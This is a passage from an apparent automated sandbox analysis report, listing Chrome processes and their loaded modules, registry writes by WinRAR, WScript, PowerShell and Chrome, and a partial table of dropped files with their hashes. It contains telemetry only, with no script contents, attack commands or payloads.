c:\program files\common files\microsoft shared\ime14\imekr\imkrtip.dll
c:\program files\microsoft office\office14\olkfstub.dll
c:\program files\microsoft office\office14\onfilter.dll
c:\program files\microsoft office\office14\mlshext.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\syncui.dll
c:\windows\system32\shdocvw.dll
c:\program files\common files\microsoft shared\office14\msoshext.dll
c:\program files\notepad++\nppshell_06.dll
c:\program files\microsoft office\office14\msohevi.dll

PID
2436
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3260 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\imm32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\usp10.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntdll.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\secur32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\lpk.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\winmm.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\userenv.dll
c:\windows\system32\webio.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\crypt32.dll

PID
2376
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3392 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\webio.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winmm.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\secur32.dll

PID
1552
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\ntdll.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\webio.dll
c:\windows\system32\winhttp.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\psapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sspicli.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\lpk.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\profapi.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\userenv.dll
c:\windows\system32\crypt32.dll

Registry activity

Total events
36320
Read events
0
Write events
279
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2256
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
1
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\QPRCK498428.iso.ISO
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
2
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2256
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
@C:\Windows\System32\wshext.dll,-4802
VBScript Script File
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2256
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath
0
C:\Users\admin\Documents
832
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
832
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
832
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
832
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
3352
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3352
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
3352
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3352
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3352
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3352
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3220
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3220
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3220
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3220
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
976
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
976
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
976
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
976
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
976
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3680
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3680
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3680
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3680
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3232
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3232
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3232
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3232
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3456
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3456
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3456
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3456
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3456
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
3384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1124
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1124
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
1124
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1124
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1124
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
3428
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C800000000000000000000000000D40103000000000039000000B40200000000000001000000
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\Documents
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C800000000000000000000000000F80104000000000016000000640000000000000003000000
3428
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C800000000000000000000000000F201030000000000160000002A0000000000000002000000
1612
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1612
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1612
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1612
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3144
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
3144
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
3144
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3144
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3144
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2960
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2960
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2960
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2960
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3812
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3812
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
3812
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3812
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3812
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
01000000
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
1488
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
1488
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13286674504881804
3552
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
516
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
120
Text files
83
Unknown types
6

Dropped files

PID
Process
Filename
Type
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\81562b29-189b-464e-b651-0ad86e9a2f46.tmp
text
MD5: 238b9bb12cc68df14a41daf550fcc7ab
SHA256: 35fa8893af45106c1812eee6a1a60d72baf1e1aca2a0eb6d6665651cda57ed52
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF169a9f.TMP
text
MD5: e0615f797cb4301f84ba383e1aff1040
SHA256: 43e17044bf03267dd755da2a16f25dbafe23720ad991c026eaa636fb0e0a1bcd
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 238b9bb12cc68df14a41daf550fcc7ab
SHA256: 35fa8893af45106c1812eee6a1a60d72baf1e1aca2a0eb6d6665651cda57ed52
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
text
MD5: 3a4a069a07ed2bda43e730c2bf6c5bd7
SHA256: 01a3f263555b646e1993953ebf1641851386da4ec5eb1378d994f2a645da4cca
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
binary
MD5: 90f880064a42b29ccff51fe5425bf1a3
SHA256: 965203d541e442c107dbc6d5b395168123d0397559774beae4e5b9abc44ef268
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\CURRENT
text
MD5: 46295cac801e5d4857d09837238a6394
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\temp-index
binary
MD5: 77c37e1d4402401a0f3fbe310a5d5f4c
SHA256: 0aa2b5fd0edd959ddbc70f7789be333f08ee9f83e3c4526957d4bb9c2956a2a2
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000001.dbtmp
text
MD5: 46295cac801e5d4857d09837238a6394
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda\Chrome Web Store Payments.ico.md5
binary
MD5: 61b979eca159ecac9c7f8f1d6fd43e9d
SHA256: ab05e0a6ff7e8fff89f924b279d93afc72acce817c4d250c60bb8059cc534303
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
binary
MD5: 51a2cbb807f5085530dec18e45cb8569
SHA256: 1c43a1bda1e458863c46dfae7fb43bfb3e27802169f37320399b1dd799a819ac
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications\LOG.old
text
MD5: 23fe827c759c66b4bf79534f0382b7f5
SHA256: 8aeb5a8d1604e253bd3545d587604ed5d1899950c7fd82c4b809a9d04d296f2c
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda\Chrome Web Store Payments.ico
image
MD5: 6c53108c981c84582b760dad57e31d37
SHA256: ac7bff1ae4531a65d6cafbea3b3b1189af82e98e1bb535494b66c404dac89f52
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\the-real-index
binary
MD5: 77c37e1d4402401a0f3fbe310a5d5f4c
SHA256: 0aa2b5fd0edd959ddbc70f7789be333f08ee9f83e3c4526957d4bb9c2956a2a2
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda\d32e7c11-7323-49f7-8b7d-ec7f9e30ffd6.tmp
image
MD5: 6c53108c981c84582b760dad57e31d37
SHA256: ac7bff1ae4531a65d6cafbea3b3b1189af82e98e1bb535494b66c404dac89f52
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\MANIFEST-000001
binary
MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old
text
MD5: cb7250236eb5beed080d36e442095200
SHA256: 717eb0ac0830309a339ac7c7dbd3260b435db0c870e38bdd11336787791087d4
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index
binary
MD5: 54cb446f628b2ea4a5bce5769910512e
SHA256: fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
1488
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir1488_1977960809\CRX_INSTALL\_locales\lt\messages.json
binary
MD5: 4ca644f875606986a9898d04bdae3ea5
SHA256: 7c311ab751d840d750c11553c083785813e079c1d464fe568a98c9e3ef3db96c
1488
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir1488_1977960809\CRX_INSTALL\_locales\ko\messages.json
binary
MD5: 9f6b4d82a70c74ca751e2eae70fab5cf
SHA256: d1467b8d037114403e8f4efc52e88c4a7feb96126be4cff883feff1084ef7e68
1488
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old~RF167e7b.TMP
text
MD5: 6fe92100838f65d6cb564d68d48c0659
SHA256: 469b11de5e2a5742926b6e04d22e03bac570e0d365eaffb09300d93a0f0e2834
1488
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir1488_1977960809\CRX_INSTALL\_locales\zh_CN\messages.json
binary
MD5: bb73bf561bb79f89d9bf7c67c5ae5c65
SHA256: d804f2a040d21d7511efd5213d8e1721d64964a1a0dbb48e21622ceedc9d967e
1488
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir1488_1977960809\CRX_INSTALL\_locales\ru\messages.json
binary
MD5: db2edf1465946c06bd95c71a1e13ae64
SHA256: fbaf22ce6e16de174ced8cb5ea3098cca1c3426a2111ff33bd3e64da64ed67ab
1488
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir1488_1977960809\CRX_INSTALL\_locales\pl\messages.json
binary
MD5: 0e6194126afccd1e3098d276a7400175
SHA256: e2699f98c511b18a2afb82eae9a4804b646c4ff1077d80e77c17a3943a6373c2
1488
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir1488_1977960809\CRX_INSTALL\_locales\vi\messages.json
binary
MD5: 7ebb677fead8557d3676505225a7249a
